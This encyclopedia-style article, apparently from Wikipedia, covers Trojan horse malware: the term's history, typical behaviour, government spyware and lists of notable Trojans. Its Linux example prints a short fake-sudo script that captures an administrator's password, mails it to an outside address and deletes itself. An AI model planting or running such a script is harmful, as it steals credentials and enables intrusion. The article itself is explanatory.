In computing, a Trojan horse  is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy.

Trojans generally spread by some form of social engineering; for example, where a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer. Ransomware attacks are often carried out using a Trojan.

Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.

Use of the term 
It's not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both:

Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems.

It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", subtitled: To what extent should one trust a statement that a program is free of Trojan horses?  Perhaps it is more important to trust the people who wrote the software. He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.

Behavior
Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action.

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software. Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer and the German "state Trojan" nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.

Linux example
A Trojan horse is a program that purports to perform some obvious function, yet upon execution it compromises the user's security. One easy program is a new version of the Linux sudo command. The command is then copied to a publicly writable directory like /tmp. If an administrator happens to be in that directory and executes sudo, then the Trojan horse might be executed. Here is a working version:

:
# sudo
# ----

# Turn off the character echo to the screen.
stty -echo

/bin/echo -n "Password for `whoami`: "
read x
/bin/echo ""

# Turn back on the character echo.
stty echo

echo $x | mail -s "`whoami` password" outside@creep.com
sleep 1
echo Sorry.
rm $0

exit 0

For example: PATH=/usr/local/bin:/usr/bin:..

Notable examples

Private and governmental
 ANOM - FBI
 0zapftis / r2d2 StaatsTrojaner – DigiTask
 DarkComet – CIA / NSA
 FinFisher – Lench IT solutions / Gamma International 
 DaVinci / Galileo RCS – HackingTeam
 Magic Lantern – FBI
 SUNBURST – SVR/Cozy Bear (suspected)
 TAO QUANTUM/FOXACID – NSA
 WARRIOR PRIDE – GCHQ

Publicly available
 EGABTR – late 1980s
 Netbus – 1998 (published)
 Sub7 by Mobman – 1999 (published)
 Back Orifice – 1998 (published)
 Beast – 2002 (published)
 Bifrost Trojan – 2004 (published)
 DarkComet – 2008-2012 (published)
 Blackhole exploit kit – 2012 (published)
 Gh0st RAT – 2009 (published)
 MegaPanzer BundesTrojaner – 2009 (published)
 MEMZ by Leurak – 2016 (published)

Detected by security researchers
 Twelve Tricks – 1990
 Clickbot.A – 2006 (discovered)
 Zeus – 2007 (discovered)
 Flashback Trojan – 2011 (discovered)
 ZeroAccess – 2011 (discovered)
 Koobface – 2008 (discovered)
 Vundo – 2009 (discovered)
 Coreflood – 2010 (discovered)
 Tiny Banker Trojan – 2012 (discovered)
 SOVA - 2022 (discovered)
 Shedun Android malware – 2015 (discovered)

Capitalization 
The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.

See also
 Computer security
 Cuckoo's egg (metaphor)
 Cyber spying
 Dancing pigs
 Exploit (computer security)
 Industrial espionage
 Phishing
 Principle of least privilege
 Privacy-invasive software
 Remote administration
 Remote administration software
 Reverse connection
 Rogue security software
 Scammers
 Technical support scam
 Timeline of computer viruses and worms
 Zombie (computer science)

References

External links

 
Social engineering (computer security)
Spyware
Web security exploits
Cyberwarfare
Security breaches